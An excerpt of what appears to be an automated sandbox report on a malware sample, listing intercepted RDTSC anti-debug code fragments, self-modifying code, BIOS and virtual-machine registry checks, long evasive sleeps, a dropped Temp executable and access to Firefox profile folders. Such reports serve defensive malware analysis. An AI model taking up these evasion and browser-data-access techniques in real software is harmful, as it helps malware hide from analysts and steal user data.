Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757106C second address: 7571116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C27B7Bh 0x00000009 or eax, 7E53828Eh 0x0000000f jmp 00007FA278C27B89h 0x00000014 popfd 0x00000015 mov cx, 0197h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ecx, esi 0x0000001e pushad 0x0000001f mov dl, 8Ch 0x00000021 popad 0x00000022 mov dword ptr [esi+0Ch], eax 0x00000025 jmp 00007FA278C27B7Eh 0x0000002a mov edx, 772406ECh 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FA278C27B7Eh 0x00000036 and ecx, 4423EF68h 0x0000003c jmp 00007FA278C27B7Bh 0x00000041 popfd 0x00000042 mov bl, ah 0x00000044 popad 0x00000045 mov eax, 00000000h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007FA278C27B7Dh 0x00000053 sbb eax, 5D3C6186h 0x00000059 jmp 00007FA278C27B81h 0x0000005e popfd 0x0000005f mov si, 9337h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571116 second address: 75711A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f mov esi, 487B7B79h 0x00000014 pushfd 0x00000015 jmp 00007FA278C0D026h 0x0000001a adc eax, 0CDBF688h 0x00000020 jmp 00007FA278C0D01Bh 0x00000025 popfd 0x00000026 popad 0x00000027 call 00007FA278C0D028h 0x0000002c mov ecx, 03BDBB01h 0x00000031 pop esi 0x00000032 popad 0x00000033 pop edi 0x00000034 jmp 00007FA278C0D01Dh 0x00000039 test eax, eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jmp 00007FA278C0D023h 0x00000043 mov dl, ah 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75711A4 second address: 7571272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FA2E8876098h 0x0000000f pushad 0x00000010 mov esi, 198EB7FDh 0x00000015 call 00007FA278C27B7Ah 0x0000001a pushfd 0x0000001b jmp 00007FA278C27B82h 0x00000020 sub si, A008h 0x00000025 jmp 00007FA278C27B7Bh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d mov edx, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 mov dl, 1Bh 0x00000033 pushfd 0x00000034 jmp 00007FA278C27B7Eh 0x00000039 sbb ecx, 6B51C268h 0x0000003f jmp 00007FA278C27B7Bh 0x00000044 popfd 0x00000045 popad 0x00000046 mov eax, dword ptr [esi] 0x00000048 jmp 00007FA278C27B86h 0x0000004d mov dword ptr [edx], eax 0x0000004f jmp 00007FA278C27B80h 0x00000054 mov eax, dword ptr [esi+04h] 0x00000057 pushad 0x00000058 mov si, 150Dh 0x0000005c mov edx, ecx 0x0000005e popad 0x0000005f mov dword ptr [edx+04h], eax 0x00000062 jmp 00007FA278C27B84h 0x00000067 mov eax, dword ptr [esi+08h] 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571272 second address: 7571279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571279 second address: 757127F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757127F second address: 75712A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov ecx, edx 0x00000011 popad 0x00000012 mov eax, dword ptr [esi+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA278C0D01Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75712A0 second address: 75712E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FA278C27B81h 0x00000017 adc esi, 07C97206h 0x0000001d jmp 00007FA278C27B81h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75712E2 second address: 7571345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C0D027h 0x00000009 adc si, 813Eh 0x0000000e jmp 00007FA278C0D029h 0x00000013 popfd 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+10h] 0x0000001d pushad 0x0000001e mov bh, C9h 0x00000020 mov cx, EE11h 0x00000024 popad 0x00000025 mov dword ptr [edx+10h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA278C0D023h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571345 second address: 757137B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c jmp 00007FA278C27B7Eh 0x00000011 mov dword ptr [edx+14h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov dl, al 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757137B second address: 75713CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esi+18h] 0x00000008 jmp 00007FA278C0D01Eh 0x0000000d mov dword ptr [edx+18h], eax 0x00000010 jmp 00007FA278C0D020h 0x00000015 mov eax, dword ptr [esi+1Ch] 0x00000018 jmp 00007FA278C0D020h 0x0000001d mov dword ptr [edx+1Ch], eax 0x00000020 pushad 0x00000021 jmp 00007FA278C0D01Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 mov si, C1E7h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75713CF second address: 75713FB instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+20h] 0x0000000b pushad 0x0000000c mov dl, F2h 0x0000000e call 00007FA278C27B7Eh 0x00000013 mov eax, 2C117BE1h 0x00000018 pop esi 0x00000019 popad 0x0000001a mov dword ptr [edx+20h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75713FB second address: 75713FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75713FF second address: 7571405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571405 second address: 7571469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007FA278C0D01Eh 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 call 00007FA278C0D01Dh 0x0000001c pop eax 0x0000001d pushfd 0x0000001e jmp 00007FA278C0D021h 0x00000023 add cx, 8676h 0x00000028 jmp 00007FA278C0D021h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571469 second address: 7571527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007FA278C27B83h 0x0000000c sub ax, ABAEh 0x00000011 jmp 00007FA278C27B89h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+28h] 0x0000001d jmp 00007FA278C27B7Eh 0x00000022 mov dword ptr [edx+28h], eax 0x00000025 pushad 0x00000026 push esi 0x00000027 push edx 0x00000028 pop ecx 0x00000029 pop ebx 0x0000002a pushfd 0x0000002b jmp 00007FA278C27B86h 0x00000030 and ch, FFFFFF88h 0x00000033 jmp 00007FA278C27B7Bh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ecx, dword ptr [esi+2Ch] 0x0000003d pushad 0x0000003e mov edi, eax 0x00000040 mov si, 1BF7h 0x00000044 popad 0x00000045 mov dword ptr [edx+2Ch], ecx 0x00000048 pushad 0x00000049 pushad 0x0000004a mov cx, 2085h 0x0000004e jmp 00007FA278C27B82h 0x00000053 popad 0x00000054 movzx esi, bx 0x00000057 popad 0x00000058 mov ax, word ptr [esi+30h] 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FA278C27B7Fh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571527 second address: 7571544 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571544 second address: 757156C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA278C27B7Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757156C second address: 7571572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571572 second address: 7571576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571576 second address: 75715FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA278C0D01Bh 0x00000014 jmp 00007FA278C0D023h 0x00000019 popfd 0x0000001a mov eax, 59A11D5Fh 0x0000001f popad 0x00000020 mov dx, cx 0x00000023 popad 0x00000024 mov word ptr [edx+32h], ax 0x00000028 pushad 0x00000029 pushad 0x0000002a push esi 0x0000002b pop ebx 0x0000002c movzx ecx, di 0x0000002f popad 0x00000030 pushfd 0x00000031 jmp 00007FA278C0D01Bh 0x00000036 sub ah, 0000005Eh 0x00000039 jmp 00007FA278C0D029h 0x0000003e popfd 0x0000003f popad 0x00000040 mov eax, dword ptr [esi+34h] 0x00000043 jmp 00007FA278C0D01Eh 0x00000048 mov dword ptr [edx+34h], eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov si, bx 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75715FF second address: 7571650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 7FC7FF34h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test ecx, 00000700h 0x00000013 pushad 0x00000014 mov cx, bx 0x00000017 movsx edx, ax 0x0000001a popad 0x0000001b jne 00007FA2E8875C73h 0x00000021 jmp 00007FA278C27B7Ch 0x00000026 or dword ptr [edx+38h], FFFFFFFFh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov eax, ebx 0x0000002f call 00007FA278C27B89h 0x00000034 pop esi 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571650 second address: 75716BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C0D01Ch 0x00000009 add ecx, 1FD08278h 0x0000000f jmp 00007FA278C0D01Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FA278C0D028h 0x0000001b sbb eax, 4FFE9CD8h 0x00000021 jmp 00007FA278C0D01Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a or dword ptr [edx+3Ch], FFFFFFFFh 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FA278C0D025h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75716BB second address: 75716C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75716C0 second address: 7571746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or dword ptr [edx+40h], FFFFFFFFh 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA278C0D024h 0x00000012 adc ax, E198h 0x00000017 jmp 00007FA278C0D01Bh 0x0000001c popfd 0x0000001d movzx esi, di 0x00000020 popad 0x00000021 pop esi 0x00000022 jmp 00007FA278C0D01Bh 0x00000027 pop ebx 0x00000028 pushad 0x00000029 call 00007FA278C0D024h 0x0000002e call 00007FA278C0D022h 0x00000033 pop esi 0x00000034 pop edx 0x00000035 mov edi, esi 0x00000037 popad 0x00000038 leave 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c call 00007FA278C0D01Fh 0x00000041 pop esi 0x00000042 mov cl, dh 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75C0C11 second address: 75C0C37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e movsx edx, cx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov bx, ABF2h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75C0C37 second address: 75C0C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 call 00007FA278C0D01Fh 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7560758 second address: 7560788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1C4559EEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FA278C27B81h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA278C27B7Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7560788 second address: 75607B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FA278C0D023h 0x00000012 pop ecx 0x00000013 mov ecx, edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500686 second address: 7500696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500696 second address: 750069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 750069A second address: 75006CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA278C27B7Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA278C27B87h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75006CB second address: 7500738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C0D01Fh 0x00000009 add ecx, 5CED668Eh 0x0000000f jmp 00007FA278C0D029h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FA278C0D01Fh 0x00000023 or cx, 849Eh 0x00000028 jmp 00007FA278C0D029h 0x0000002d popfd 0x0000002e push esi 0x0000002f pop edi 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500738 second address: 7500754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B88h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500AA7 second address: 7500AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FA278C0D023h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500AC0 second address: 7500B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA278C27B84h 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FA278C27B7Eh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov bl, ah 0x00000018 pushfd 0x00000019 jmp 00007FA278C27B83h 0x0000001e sub esi, 09F1405Eh 0x00000024 jmp 00007FA278C27B89h 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B2D second address: 7500B40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B40 second address: 7500B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B46 second address: 7500B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA278C0D025h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B6F second address: 7500B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B75 second address: 7500B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 755096E second address: 7550974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7550974 second address: 7550978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7550978 second address: 7550993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov bl, 61h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7550993 second address: 75509D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C0D01Fh 0x00000009 sbb ecx, 5A54B83Eh 0x0000000f jmp 00007FA278C0D029h 0x00000014 popfd 0x00000015 mov bh, ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75509D2 second address: 75509D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75509D6 second address: 75509DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75509DC second address: 75509ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75509ED second address: 7550A0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7550A0B second address: 7550A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Special instruction interceptor: First address: 12057C5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Special instruction interceptor: First address: 13A55E9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Special instruction interceptor: First address: 13A3D71 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Special instruction interceptor: First address: 142EF7E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 1496
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 918
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 1447
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 1464
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 899
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 3491
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 6508
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 4.1 %
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7800 Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7772 Thread sleep time: -2993496s >= -30000s
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7780 Thread sleep time: -1836918s >= -30000s
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7960 Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7796 Thread sleep time: -2895447s >= -30000s
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7776 Thread sleep time: -2929464s >= -30000s
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7792 Thread sleep time: -1798899s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5856 Thread sleep count: 3491 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5856 Thread sleep time: -349100s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5856 Thread sleep count: 6508 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5856 Thread sleep time: -650800s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entries\
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomed\
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: Amcache.hve.15.dr Binary or memory string: VMware
Source: Amcache.hve.15.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.15.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.15.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.15.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.15.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.15.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.15.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
